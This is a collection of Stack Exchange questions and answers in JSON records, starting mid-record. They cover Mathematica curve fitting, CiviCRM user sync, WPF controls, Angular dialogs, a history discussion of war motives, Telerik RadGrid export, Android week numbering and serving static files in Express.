Am I right ?\nComment: Sometimes cascading works fine, but if you need more advanced logic on when to delete (as is your case), use model events.\n","meta":{"source":"stackoverflow","title":"Laravel 4.0 cascade delete and polymorphic relations","dup_signals":{}},"subset":"stackexchange"} +{"text":"Making LinearModelFit account for Log on the x-axis\n\nQuestion: I have the following code that I wish to run, which consists of 6 data points that I want to fit using <code>LinearModelFit<\/code>\n<code>Clear[\"Global`*\"]\n\n\u03d50 = 2.068*10^-15;(*femto-Tm^2*)\nzchar = 50;\nLLl1 = 500*10^-12(*H*);\nLLl2 = 900*10^-12(*H*);\nLLl3 = 1000*10^-12(*H*);\nLLl4 = 1500*10^-12(*H*);\nLLl5 = 1670*10^-12(*H*);\nLLl6 = 2000*10^-12(*H*);\nI01 = \u03d50\/(2 \u03c0*LLl1);\nI02 = \u03d50\/(2 \u03c0*LLl2);\nI03 = \u03d50\/(2 \u03c0*LLl3);\nI04 = \u03d50\/(2 \u03c0*LLl4);\nI05 = \u03d50\/(2 \u03c0*LLl5);\nI06 = \u03d50\/(2 \u03c0*LLl6);\n\nIl1 = 0.0257399*Sqrt[2]*(28.3346\/26.26)*(0.5*I01)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0227dB \\gain*);\nIl2 = 0.0257399*Sqrt[2]*(15.5602\/14.43)*(0.5*I02)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.004dB \\gain*);\nIl3 = 0.0261556*Sqrt[2]*(13.985\/12.97)*(0.5*I03)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0038dB \\gain*);\nIl4 = 0.0257399*Sqrt[2]*(9.28253\/8.61)*(0.5*I04)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0358dB \\gain*);\nIl5 = 0.0257399*Sqrt[2]*(8.33335\/7.73)*(0.5*I05)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0318dB \\gain*);\nIl6 = 0.0261566*Sqrt[2]*(6.95093\/6.448)*(0.5*I06)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.006dB \\gain*);\n\npl1 = (Il1^2*zchar)\/2*1000(*in milliWatts*);\npl2 = (Il2^2*zchar)\/2*1000(*in milliWatts*);\npl3 = (Il3^2*zchar)\/2*1000(*in milliWatts*);\npl4 = (Il4^2*zchar)\/2*1000(*in milliWatts*);\npl5 = (Il5^2*zchar)\/2*1000(*in milliWatts*);\npl6 = (Il6^2*zchar)\/2*1000(*in milliWatts*);\n\npointsLHTL = {{I01, 10 Log10[pl1]}, {I02, 10 Log10[pl2]}, {I03, \n10 Log10[pl3]}, {I04, 10 Log10[pl4]}, {I05, 10 Log10[pl5]}, {I06, 10 Log10[pl6]}};\n\nLHdynamicrange = \nListLogLinearPlot[Evaluate@pointsLHTL, \nPlotRange -> {Automatic, Automatic}, \nLabelStyle -> Directive[Black, 12], PlotLegends -> {\"LH\"}, \nJoined -> False, ImageSize -> Large, \nPlotStyle -> Directive[Blue]]\n\nLm = LinearModelFit[Log@pointsLHTL, x, x]\nLmplot = Plot[Lm[x], {x, -16, -14}, \nPlotStyle -> Directive[Blue, Dashed], PlotLegends -> {\"Linear fit\"}]\n\nShow[Lmplot, LHdynamicrange]\n<\/code>\nwhere <code>pointsLHTL<\/code> represent my data points (with the y-values under <code>Log10<\/code> and multiplied by <code>10<\/code>). <code>LHdyanmicrange<\/code> is a <code>ListLogLinearPlot<\/code> of <code>pointsLHTL<\/code> as I want the x-axis to be under Log scale as well (natural in this case).\nHowever, my fitting curve <code>Lm<\/code> and its plot <code>Lmplot<\/code> does not account for the Log values as shown in <code>LHdynamicrange<\/code>. How can I adjust my <code>Lmplot<\/code> or <code>Lm<\/code> so that it incorporates the Log scale similar to <code>LHdynamicrange<\/code> when I <code>Show<\/code> both of them on the same plot?\nThanks\nAnswer: The problem is that you are evaluating <code>Log<\/code> on all elements of <code>pointsLHTL<\/code>, not just the <code>x<\/code> values. The <code>y<\/code> values are negative so the <code>Log<\/code> is imaginary.\n<code>Lm = LinearModelFit[pointsLHTL \/. 
{x_, y_} :> {Log@x, y}, x, x]\n\nLmplot = \n Plot[Lm[x], {x, -16, -14}, PlotStyle -> Directive[Blue, Dashed], \n PlotLegends -> {\"Linear fit\"}]\n\nShow[Lmplot, LHdynamicrange]\n<\/code>\nComment: I technically want the x-axis to be showing the pre-Log values but I can fix that by simply doing `Show[LHdynamicrange,Lmplot]` instead. Thanks, this is what I'm looking for.\nComment: @kowalski You are welcome. Thanks for the accept.\n","meta":{"source":"mathematica.stackexchange","title":"Making LinearModelFit account for Log on the x-axis","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multiple contact entries created for WordPress users if they login with non-primary email addresses\n\nQuestion: We are running WordPress 4.4.2, CiviCRM 4.6.12, and the CiviCRM WordPress Member Sync and CiviCRM WordPress Profile Sync plugins.\nWhenever someone logs in with a WordPress user ID \/ email that is not their primary CiviCRM contact email, a new CiviCRM contact is created. The WP email may be listed as their \"home\" \/ \"work\" \/ \"billing\" \/ etc. email in CiviCRM but a new contact is still created. \nIn the newly created CiviCRM contact, the email address is set as \"home\" and \"primary\". The next time they login, a new contact is created, again with the email set as \"home\". We end up with a lot of duplicate contacts!\nIs this a plugin issue, or a CiviCRM issue?\nIt seems similar to the question here: Wordpress duplicates my contacts\nComment: OK with further investigation, I think I've discovered the problem. When a Wordpress User is deleted, the WP User ID is not deleted from that contact's CiviCRM contact record. Then, when a new WP User is added with the same email address as before, it is not linked to their CiviCRM contact record because there is already a WP User ID linked to it. A new CiviCRM Contact record is created each time that user logs in. I solved the issue by going to the wp_user table in the database and changing the WP user ID back to the original ID (the one linked to in the CiviCRM contact record).\nComment: From which admin page are you deleting the Users? This sounds like a CiviCRM integration bug if it doesn't also delete the `uf_match` entry\nComment: How is the mismatch happening? Are you changing the email address of the contacts in question to something other than \"primary\" in CiviCRM?\nComment: Sorry, I don't understand what you mean. Yes, the email addresses used in WordPress may not be their \"primary\" CiviCRM address. So I guess the answer is to make sure that the primary email addresses are consistent? However that doesn't explain why they continue to get more duplicate entries.\nComment: If the email used in WordPress is different to the primary email in CiviCRM, then uf_match considers them to be different users. Hence the \"duplication\", whether the sync happens via the CiviCRM plugin or one of my plugins.\nComment: But then why does it keep happening? Surely once there are two entries, the new one with the email as \"primary\" and the original\/older one with it as \"work\"\/\"home\"\/etc. and not primary, there shouldn't be any more created?\nComment: Please post the steps to reproduce your duplication scenario. Without those steps I'm as much in the dark as you are!\nComment: A solution would be not to delete WP Users but I do this when they want to change their username.\nAnswer: The issue outlined in the question and comments doesn't exist in the latest version of CiviCRM. 
Penny mentions that the issues results because \"When a Wordpress User is deleted, the WP User ID is not deleted from that contact's CiviCRM contact record\". \nI tested that this is no longer the case by creating a WordPress user, running <code>SELECT * from civicrm_uf_match<\/code> to find the corresponding entry in that table, then deleting the WordPress user. When I re-ran the SQL statement, I saw that the <code>civicrm_uf_match<\/code> entry was gone.\nAnswer: Certainly with Drupal, the user account is linked to the civi record via a table called uf_match. That table contains primary email address, drupal user id and civicrm contact id (and other fields not relevant to this question). It is that table that is checked to see if a record already exists for such a user. So it sounds like this would be an extra feature requirement for civi, and i have no idea how complex, so can't be more helpful at this point.\n","meta":{"source":"civicrm.stackexchange","title":"Multiple contact entries created for WordPress users if they login with non-primary email addresses","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get always the same instance of UserControl loaded via DataTemplate?\n\nQuestion: One ContentControl is used to load one of two UsersControls in resources via datatemplate.\nIt works fine but the constructor of every usercontrol is always called when navigating between them. How can I load always the same instance of the usercontrol (one instance for UserControl1 and one instance for Usercontrol2). I know that the tabcontrol can achieve that but how I can do it in my scenario without tabcontrol.\nResources:\n<code><UserControl.Resources>\n <DataTemplate x:Key=\"UserControl1\">\n <local:UserControl1 \/>\n <\/DataTemplate>\n <DataTemplate x:Key=\"UserControl2\">\n <local:UserControl2 \/>\n <\/DataTemplate>\n<\/UserControl.Resources>\n<\/code>\nContentControl:\n<code><ContentControl x:Name=\"ContentControl\" Background=\"White\">\n <ContentControl.Style>\n <Style TargetType=\"ContentControl\">\n <Style.Triggers>\n <DataTrigger Binding=\"{Binding CurrentView, \n ElementName=UserControl1}\" Value=\"UserControl1\">\n <Setter Property=\"ContentTemplate\" Value=\"{StaticResource UserControl1}\" \/>\n <\/DataTrigger>\n <DataTrigger Binding=\"{Binding CurrentView, ElementName=UserControl2}\" Value=\"UserControl2\">\n <Setter Property=\"ContentTemplate\" Value=\"{StaticResource UserControl2}\" \/>\n <\/DataTrigger>\n <\/Style.Triggers>\n <\/Style>\n <\/ContentControl.Style>\n<\/ContentControl>\n<\/code>\nAnswer: \nHow can I load always the same instance of the usercontrol\n\nYou should not be concerned about that. There's nothing in your post that explains why you are concerned about the constructor being called multiple times, but that should be a complete non-issue. If it's an issue, then you have something wrong with your design.\n\"View\" objects, such as windows, user controls, and indeed every <code>UIElement<\/code> that goes into presenting the program's state to the user, should not have any operations within them except that strictly needed to present the state to the user. WPF will instantiate and discard your specific instances as needed to handle the current state of the program. 
If it's in any way a problem for more than one instance of a user control to exist at a time, or for more than one instance to be created and\/or discarded over the course of running the program, then the design of the program is fundamentally broken and should be fixed.\nIf you run into any problems trying to accomplish that, of course feel free to post a question about that. Be sure to include a good Minimal, Reproducible Example, along with any details about what specifically you need help with.\nAnd of course, to start with, you should read everything you can find on the MVVM design pattern, if you haven't already. WPF has a steep learning curve when using the framework correctly, but it's even harder to use when you're not using it correctly.\nAnswer: \nHow can I load always the same instance of the usercontrol (one instance for UserControl1 and one instance for Usercontrol2)\n\nYou can hold the instances as Resources and host them inside a ContentPresenter, instead of creating a new instance everytime the DataTemplate is used:\n<code><UserControl.Resources>\n <local:UserControl1 x:Key=\"UserControl1Instance\" \/>\n <local:UserControl2 x:Key=\"UserControl2Instance\" \/>\n\n <DataTemplate x:Key=\"UserControl1\">\n <ContentPresenter Content=\"{StaticResource UserControl1Instance}\" \/>\n <\/DataTemplate>\n <DataTemplate x:Key=\"UserControl2\">\n <ContentPresenter Content=\"{StaticResource UserControl2Instance}\" \/>\n <\/DataTemplate>\n<\/UserControl.Resources>\n\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to get always the same instance of UserControl loaded via DataTemplate?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to open and close dialog from a specific position?\n\nQuestion: In my angular project i have a popup dialog open, the thing is i want the dialog to popup from the button and closes inside the button as this example shows : https:\/\/material.angularjs.org\/latest\/demo\/dialog\nopen from and close to\nHow can i do it ?\nThis is my code, it just open the popup from the center of the page:\n<code> dialogAdp() {\nconst dialogRef = this.dialog.open(DialogAdpComponent, {\n width: 'auto',\n data: { incomplete: true },\n disableClose: true\n});\n\ndialogRef.afterClosed().subscribe(result => {\n this.iD = result;\n});\n }\n<\/code>\nany help pls.\nAnswer: It was just out of curiosity, with this method you can achieve a similar effect like in You example:\n<code>const dialogRef = this.dialog.open(LoginDialogComponent, {\n width: '320px',\n });\n let center = (window.innerWidth \/ 2) - 160;\n let yu = 0\n dialogRef.updatePosition({left: '0px'})\n const interv = setInterval(() => {\n if (center > yu) {\n yu += 20;\n dialogRef.updatePosition({ left: (yu) + 'px' })\n } else {\n clearInterval(interv);\n center = window.innerWidth;\n }\n });\n\n dialogRef.beforeClosed().subscribe(() => {\n yu = 0\n const interv = setInterval(() => {\n if (center > 0) {\n yu -= 15;\n dialogRef.updatePosition({ right: (yu) + 'px' })\n } else {\n clearInterval(interv);\n center = window.innerWidth;\n }\n });\n })\n<\/code>\nRemove dialogRef.beforeClose from opne dialog metod,\nand adding to close method in Dialog Component result is the same\n<code>onNoClick(): void {\n const elemRect = this.dialogRef._containerInstance['_elementRef']\n let yu = elemRect.nativeElement.offsetLeft;\n const interv = setInterval(() => {\n if (yu > - 160) {\n yu -= 10;\n this.dialogRef.updatePosition({ right: (yu) + 'px' })\n \n } else {\n clearInterval(interv);\n this.dialogRef.close();\n }\n 
});\n }\n<\/code>\ndialogref have updateSize option that is posible change dimension on close.\nFor Fun\nAnswer: Currently the MatDialog API doesn't expose any way to achieve this. The animations are not defined in their .scss files but in .ts files, so you won't be able to override it either. Your best bet would be creating your own custom Dialog using angular-cdk overlay (or you could try creating an issue on the material github, but odds of it being implemented any time soon would be slim).\nThere are different methods of creating custom overlay components, and the implementation is long so I won't dive into that here - but googling \"cdk overlay dialog\" should give you an idea of how this can be done.\n","meta":{"source":"stackoverflow","title":"how to open and close dialog from a specific position?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Examples of wars without power as a motive\n\nQuestion: I'm more of a social historian than military historian, but if I understand correctly war between two factions is almost always a struggle for power.\nIs that the case? Are there examples of wars started for other reasons?\nEdit:\nThere were some comments about the vagueness of the term power so I'm going to try to be more specific about it. By 'struggle for power', I mean:\n\na struggle for more energy, as in actual physical energy in some form\n\nI understand that this sounds even more vague than the term power itself, but that's exactly the point of the question. I wonder if you can reduce human conflict to power conflict.\nComment: Exactly what do you mean by \"power\"? It is a term so vague that any motive for war could be framed as some form of \"power struggle\".\nComment: One theory is that in Malthusian terms since you cannot produce more land, war is always about grabbing land to increase productivity. Nowadays of course land could be translated as other resources as well, such as oil.\nComment: It might be more illuminating if you try to phrase this question in terms of counterexamples. What kind of motivations would, in your estimation, **not count** as \"power\" (or \"physical energy\" in the edit)?\nComment: Power:\n1) political or national strength\n2) the possession of control or command over others; authority; ascendancy:\n3) great or marked ability to do or act; strength; might; force\n\nPretty specific term, actually.\nComment: @CanadianCoder Not really, no. Is raiding someone for loot \"power\"? Forcing them to convert to your religion or system of government? What do you mean by \"strength\", \"control\", or \"act\"?\nComment: The word \"power\" is simply not specific at all. You can interpret it to mean just about *anything*. Consequently you can very well interpret all wars to be \"motivated\" by \"power\", but that not a valuable insight at all.\nComment: It does mean a very specific and easily identifiable thing, but that very specific thing happens to be a super-class of many sub-motivations. If I call an animal an animal, you know what I mean, you just don't know as much if I call the animal a dog. So if all wars are about power, that tells us something important, but not everything, about people.\nComment: This is a vague question. The Trojan War was to rescue Helen!\nComment: OT: I misread _\"Examples of **cars** without power as a motive\"_ and I was all like \"WAT?!\"\nComment: @CanadianCoder Caveat: I don't mean this as an insult, or personal bash, really I don't. But. Several users, regular users as well, all questioned your use of a word. 
You have come back saying, essentially, \"it means what it means, don't you get it?\" At that point, I might suggest you revisit your question and attempt to reword it in a way that the people who spend quite a lot of time here curating agree is useful.\nComment: I don't mean to come across as argumentative, and I guess I have less cred due to less rep, but I wrote the question exactly how I intended to write it. If the problem is being more specific about what I mean by power, I can edit the question, but I thought the definition of the word 'power' was pretty clear. If the problem is the use of the word power at all, I disagree with the issue.\nComment: Note that I never mentioned reputation. There is a commenter here, in fact, who has a fairly high reputation number, but his credibility is not what it _should_ be. :) Not naming names. I simply meant that instead of telling all of \"us\" we are wrong in thinking you use of the word power might'n't have been appropriate, maybe choose a synonym, **or** be more explicit in your question's descriptive narrative.\nComment: I've edited the question. Thanks for the comments : - )\nComment: I'm afraid the edit makes it less clear for me - what is \"physical energy\"? I don't understand that at all. Are you exploring the \"it's all about the oil\" thesis?\nComment: That's a good point. I'll have to give that one some thought.\nComment: I don't really know how I can make this question any more clear, outside of giving an arbitrary number of examples. Might as well just close it.\nAnswer: Treaties sometimes obligate nations to go to war. One example is the Theater War between Denmark-Norway and Sweden in 1788. Sweden made an unprovoked attack on Russia. Russia began to demand that Denmark-Norway to invade Sweden, as was stipulated in a 1773 treaty.\nBy the time a statement of neutrality had been issued, several thousand soldiers had died. This war had no real effect on the balance of power between the two combatants; the war was really just about Denmark-Norway honoring the terms of its treaty with Russia.\nOf course, why had Denmark-Norway signed this treaty with Russia in the first place? Well, that certainly had something to do with power. It's an issue of ultimate versus proximate causes.\nThere are also those who consider some wars to be domestic diversions. However, even if domestic concerns were something of a factor in the decision to go to war, it would be hard to believe that power considerations were irrelevant to the decision as well.\nComment: Even the example you give _could_ be construed to have been 'power' based. Russia used its diplomatic 'power' to enforce the treaty. If it didn't have some form of power backing it, then Denmark and Norway could have (diplomatically) said lump it.\nComment: @CGCampbell: Reputation is relevant here. If Denmark-Norway says \"lump it,\" then other countries would take Denmark-Norway's word less seriously in the future. So Russia doesn't necessarily enter into the equation. But I don't know enough about the case at hand to say whether the explanation here is more reputation or power.\nAnswer: When I was in college during the last millennium, there was a standard text on this. I believe it was \"Why Nations Go to War\" by Stoessinger; things may have changed in the new millennium. 
IO9 provides a traditional top 10 list, which is worth what you pay for it.\nAs the comments have pointed out \"power\" is a weasely word that can be construed to mean anything- kind of like the ultimate cause of death is heart failure, it is fair to retro-fit \"power\" to any conflict. \nYou've also used the term \"factions\" rather than \"nations\"; I'm not sure why, but let's assume that you want to include civil wars. \nAnd finally, why people go to war is often not the reasons they state. The grade school narrative today is that the US Civil War was about slavery, but I think a responsible historical analysis would have to include conflicts that began before the Constitutional convention and that might include differing economic systems (and mutual contempt for one another's economic systems), differing alliances (and mutual contempt thereof), differing agendas (and mutual contempt), etc. Culture, tradition, and isolation all played a part; fundamentally they had divergent, incompatible visions for the future. If I wanted to, I can make the argument that the two factions went to war over the power to determine their own futures, but I don't think that would help me to understand why these two factions went to war.\nThe other weakness with the \"power\" thesis is that it doesn't help us to predict. What was it that finally forced faction X over the edge from resistance and debate to war? There are endless pages written on the significance of the Archduke Ferdinand to the start of WWI. (I don't know if it is true, but I'm told more people went to the assassin's funeral than the Archduke's.)\nMatter of fact, WWI might be the counterexample you're looking for. I think the general consensus (with much debate) is that none of the players wanted war, but they all made commitments that wound up making it easier to participate in war than to avoid war. From that standpoint, WWI was not about power.\nThe Revolutionary war would be another good case study; neither side wanted a war. Neither side wanted \"power\". You could force fit the situation to claim that the Colonials wanted the power of self-determination and Parliament wanted the power of taxation, but I don't think that is a useful framework.\nOP has edited the question to emphasize power as \"energy\" - energy was not involved in the start of any of the three wars I've discussed. (the case for backfitting energy into the any of these is even weaker than the case for power).\nFinal comment; there are an infinite number of analytic frameworks one can use to study history. The measure of a good analytical framework is not whether you can or cannot fit examples to the theory, but rather whether the framework improves the understanding. Does it have predictive power? does it help to isolate the critical factors from other factors which are present?\nI doubt that either \"power\" or \"energy\" provide these properties.\nComment: Nice answer. Although, I think that the concept of power is definitely predictive. 
The question isn't whether it's predictive, but whether it's predictive with complete accuracy, and what the other factors are.\nComment: WWI wasn't so much about nobody wanted or not wanted the war, it was about \"Germans couldn't afford to shoot second, so they HAD to shoot first\" (basically, to pre-empt Russian mobilization and entry into Eastern front before Germany knocked out France).\nAnswer: In one of the pacific islands colonized by the Germans, one tribesmen accidentally killed a member of another tribe at a wedding with guests from all the appox 12 tribes on the island. The result was an every tribe v. Every other tribe in a 10 year civil war until the Germans kidnapped all the chiefs and threatened to kill them until there was peace. The civil war was not about one tribe conquering the other but soley about rrvenge\n.\n","meta":{"source":"history.stackexchange","title":"Examples of wars without power as a motive","dup_signals":{}},"subset":"stackexchange"} +{"text":"Column header size when exporting radgrid to PDF\n\nQuestion: I have a radgrid with autogenerated columns which should be exported to PDF, but when I export the grid when it contains many columns, the headers overlap each other. I want to control the size of the header text font.\nAnswer: Add this to the exporting command:\n<code>GridColumn column = RadGrid1.MasterTableView.GetColumn(\"Phone\");\ncolumn.HeaderStyle.Width = Unit.Pixel(80);\nRadGrid1.MasterTableView.ExportToPdf();\n<\/code>\n","meta":{"source":"stackoverflow","title":"Column header size when exporting radgrid to PDF","dup_signals":{}},"subset":"stackexchange"} +{"text":"Wrong \"week of year\" in Android\n\nQuestion: The number of \"week of year\" returned from a Date is wrong.\nThis is my code:\n<code>Calendar c = Calendar.getInstance();\nc.setTime(my_date);\nint num_week = c.get(Calendar.WEEK_OF_YEAR);\n<\/code>\nIf my_date (type Date) is 01\/01\/2011, I supposed that \"week of year\" is 1. But it returned 52.\nI try to test with these methods but I don't obtain anything:\n<code>c.setFirstDayOfWeek(6);\nc.setMinimalDaysInFirstWeek(1)\n<\/code>\nIf It's interesting, I'm from Spain, and our week begin on Monday.\nHave I to do anything for obtain right results?\nThanks!\nComment: possible duplicate of [Why dec 31 2010 returns 1 as week of year?](http:\/\/stackoverflow.com\/questions\/4608470\/why-dec-31-2010-returns-1-as-week-of-year)\nComment: The first and last week of the year are dependent on locale - see link above for a duplicate question and explanation.\nComment: @Metro: But setting the minimal number of days of the first week to 1 *should* fix it regardless.\nAnswer: This may be Android\/Harmony-specific. For example, this works for me with desktop Java:\n<code>import java.util.*;\n\npublic class Test {\n public static void main(String[] args) {\n Calendar calendar = Calendar.getInstance();\n calendar.set(2011, 0, 1, 0, 0, 0);\n System.out.println(calendar.get(Calendar.WEEK_OF_YEAR)); \/\/ Prints 52\n calendar.setMinimalDaysInFirstWeek(1);\n System.out.println(calendar.get(Calendar.WEEK_OF_YEAR)); \/\/ Prints 1\n }\n}\n<\/code>\nCan you confirm that the exact same code (modulo logging options) logs 52 twice on Android?\nComment: What happens with: `Calendar.getInstance(Locale.SPAIN)`?\nComment: @Metro: With `new Locale(\"es\")` I get 1 both times. With `new Locale(\"es\", \"ES\")` I get 52 and 1.\nComment: Interesting. 
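Side note on the expected value itself: ISO-8601 week numbering (weeks start on Monday, and week 1 is the week containing the first Thursday, i.e. at least 4 days of the new year), which is the convention used in Spain and most of Europe, really does put 1 January 2011 into week 52 of 2010. A quick cross-check in Python, offered only as an illustration in another language rather than a fix for the Java/Android code:
<code>import datetime

# ISO-8601: weeks start on Monday and week 1 needs at least 4 days of the new year.
iso_year, iso_week, iso_weekday = datetime.date(2011, 1, 1).isocalendar()
print(iso_year, iso_week, iso_weekday)   # 2010 52 6 -> a Saturday in week 52 of 2010
</code>
So a Calendar left at the Spanish default (minimal days in first week = 4) is arguably answering correctly with 52; calling setMinimalDaysInFirstWeek(1) changes the convention so that the week containing 1 January always counts as week 1, which is why desktop Java then reports 1.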
I'm curious to see if this is Android specific.\nComment: Got curious and ran your sample code against every available locale on Android 2.3. All values returned incorrectly with 52\/52. Then ran against Android 3.2. All locales except \"fa_x\" and most of \"ar_x\" again returned incorrectly with 52\/52 (fa_x, ar_x returned 1\/1).\nComment: @Metro: Thanks for the testing. Curious. Have you tried the Apache Harmony project on a desktop?\nComment: I am completely new with the Java platform; just trying to make a cross-over to developing Android apps. The Apache Harmony project is above my pay-grade.\nComment: @Metro: Fair enough - thanks for the Android testing anyway :)\nComment: Thank you!\nNow It seems it work. I use:\n Calendar c = Calendar.getInstance(new Locale(\"es\", \"ES\"));\n c.setMinimalDaysInFirstWeek(2);\nI test with different values of setMinimalDaysInFirstWeek, and the results for 1\/1\/2011 were:\n- Value 1: 52\n- Value 2: 1\n- Value 3: 53\n- Value 4: 52\n\nI test with 2 and It works. The only problem is that some days of last week of the year (for example 31\/12) it detects as week 1, but I show a 52 to the user.\nand\nAnswer: Here you can view the reference by oracle \nhttps:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/GregorianCalendar.html\nAnd I have placed a quick solution to find the week count of current day. You can alter and optimize as your way. Also set according to your convenient GMT value\n<code>public static int getWeeksOfMonth() {\n\n DATESTATUS = false;\n VALUESTATUS = false;\n int weekCount;\n WEEK_OF_MONTH= -1;\n\n \/\/ get the supported ids for GMT+04:00 (Pacific Standard Time)\n String[] ids = getAvailableIDs(4 * 60 * 60 * 1000);\n \/\/ if no ids were returned, something is wrong. get out.\n if (ids.length == 0)\n return WEEK_OF_MONTH;\n\n \/\/ create a Pacific Standard Time time zone\n SimpleTimeZone pdt = new SimpleTimeZone(4 * 60 * 60 * 1000, ids[0]);\n\n \/\/ create a GregorianCalendar with the Pacific Daylight time zone\n \/\/ and the current date and time\n Calendar calendar = new GregorianCalendar(pdt);\n Date trialTime = new Date();\n calendar.setTime(trialTime);\n\n weekCount = calendar.get(Calendar.WEEK_OF_YEAR);\n\n return recursiveWeekCountCheck(calendar, weekCount);\n}\n\nprivate static int recursiveWeekCountCheck(Calendar calendar, int weekCount) {\n if (calendar.get(Calendar.MONTH) == Calendar.DECEMBER && weekCount == 1) {\n DATESTATUS = true;\n calendar.add(Calendar.DAY_OF_MONTH, -1);\n weekCount = calendar.get(Calendar.WEEK_OF_YEAR);\n recursiveWeekCountCheck(calendar, weekCount);\n }\n if (!VALUESTATUS){\n VALUESTATUS = true;\n if (DATESTATUS) {\n weekCount++;\n WEEK_OF_MONTH = weekCount;\n } else {\n WEEK_OF_MONTH = weekCount;\n }\n }\n return WEEK_OF_MONTH;\n}\n<\/code>\nAt the end just call the method getWeeksOfMonth();\n","meta":{"source":"stackoverflow","title":"Wrong \"week of year\" in Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Express-js can't GET my static files, why?\n\nQuestion: I've reduced my code to the simplest express-js app I could make:\n<code>var express = require(\"express\"),\n app = express.createServer();\napp.use(express.static(__dirname + '\/styles'));\napp.listen(3001);\n<\/code>\nMy directory look like this:\n<code>static_file.js\n\/styles\n default.css\n<\/code>\nYet when I access <code>http:\/\/localhost:3001\/styles\/default.css<\/code> I get the following error:\n<code>Cannot GET \/ styles \/\ndefault.css\n<\/code>\nI'm using <code>express 2.3.3<\/code> and <code>node 
0.4.7<\/code>. What am I doing wrong?\nComment: check below link http:\/\/only4ututorials.blogspot.com\/2017\/05\/how-to-serve-static-file-in-express-js.html\nAnswer: Try <code>http:\/\/localhost:3001\/default.css<\/code>.\nTo have <code>\/styles<\/code> in your request URL, use:\n<code>app.use(\"\/styles\", express.static(__dirname + '\/styles'));\n<\/code>\nLook at the examples on this page:\n<code>\/\/Serve static content for the app from the \"public\" directory in the application directory.\n\n \/\/ GET \/style.css etc\n app.use(express.static(__dirname + '\/public'));\n\n\/\/ Mount the middleware at \"\/static\" to serve static content only when their request path is prefixed with \"\/static\".\n\n \/\/ GET \/static\/style.css etc.\n app.use('\/static', express.static(__dirname + '\/public'));\n<\/code>\nComment: always use `path.join` to overcome cross platform directory separator issues. path.join(__dirname, '\/')\nComment: I put that at my code, but the browser always redirect to \"\/static\/myjs.js\/\", that last \/ give me an error of MIME Type\nComment: In case of new install you should verify that your express module is properly installed (http:\/\/expressjs.com\/en\/starter\/installing.html) then you should check the path and your directory name like Giacomo said ;)\nComment: Does the mount path make sense in `Express` in `prod` or is it a testing issue for dev? Maybe it looks more ordered to have an url folder.\nComment: If anyone using TypeScript (or not) stumbles upon this comment and has the same problem: if your file is in a `src\/` dir, use `path.join(__dirname, \"..\/public\")`.\nComment: Shouldn't app.use() without a specified path handle all requests? Then why will `app.use(express.static(__dirname + '\/public'));` not work for \/static?\nComment: oh darn, app.get doesn't work, has to be app.use\nAnswer: I have the same problem. I have resolved the problem with following code:\n<code>app.use('\/img',express.static(path.join(__dirname, 'public\/images')));\napp.use('\/js',express.static(path.join(__dirname, 'public\/javascripts')));\napp.use('\/css',express.static(path.join(__dirname, 'public\/stylesheets')));\n<\/code>\nStatic request example:\n<code>http:\/\/pruebaexpress.lite.c9.io\/js\/socket.io.js\n<\/code>\nI need a more simple solution. Does it exist?\nComment: Thank you for sharing your solution regardless of whether it is optimal or not. If you want to reopen the issue for optimization, consider posting a new question detailing the new circumstances. If optimization is the sole purpose, the question may be better suited to [SO Code Review](http:\/\/stackoverflow.com\/questions\/tagged\/code-review).\nComment: In my case, the only way to make static imports work with expressjs has been to use the \"`path`\" module. All other solutions without `path.join` or prepending the `__dirname` string have been fruitless.\nAnswer: This work for me:\n<code>app.use('*\/css',express.static('public\/css'));\napp.use('*\/js',express.static('public\/js'));\napp.use('*\/images',express.static('public\/images'));\n<\/code>\nAnswer: <code>default.css<\/code> should be available at <code>http:\/\/localhost:3001\/default.css<\/code>\nThe <code>styles<\/code> in <code>app.use(express.static(__dirname + '\/styles'));<\/code> just tells express to look in the <code>styles<\/code> directory for a static file to serve. It doesn't (confusingly) then form part of the path it is available on.\nComment: Totally! 
Which is by convention in express.js you do it on `\/public` which has `css`, `js`, `img` folders so you can `http:\/\/localhost:3001\/css\/default.css` :)\nAnswer: In your server.js :\n<code>var express = require(\"express\");\nvar app = express();\napp.use(express.static(__dirname + '\/public'));\n<\/code>\nYou have declared express and app separately, create a folder named 'public' or as you like, and yet you can access to these folder. In your template src, you have added the relative path from \/public (or the name of your folder destiny to static files). Beware of the bars on the routes.\nAnswer: I am using Bootstrap CSS, JS and Fonts in my application. I created a folder called <code>asset<\/code> in root directory of the app and place all these folder inside it. Then in server file added following line:\n<code>app.use(\"\/asset\",express.static(\"asset\"));\n<\/code>\nThis line enables me to load the files that are in the <code>asset<\/code> directory from the <code>\/asset<\/code> path prefix like: <code>http:\/\/localhost:3000\/asset\/css\/bootstrap.min.css<\/code>.\nNow in the views I can simply include CSS and JS like below:\n<code><link href=\"\/asset\/css\/bootstrap.min.css\" rel=\"stylesheet\">\n<\/code>\nComment: This is the answer that is well explained that worked for me. +1 for taking the pain to elaborate and give an example that works. Last time this worked for me on a previous project it was just by fluke but today as I work on another new project I understand how it works from the good explanation in your answer.\nAnswer: What worked for me is:\nInstead of writing <code>app.use(express.static(__dirname + 'public\/images'));<\/code> in your app.js\nSimply write \n<code>app.use(express.static('public\/images'));<\/code>\ni.e remove the root directory name in the path. And then you can use the static path effectively in other js files, For example: \n<code><img src=\"\/images\/misc\/background.jpg\">\n<\/code>\nHope this helps :)\nComment: This solved my issue. 
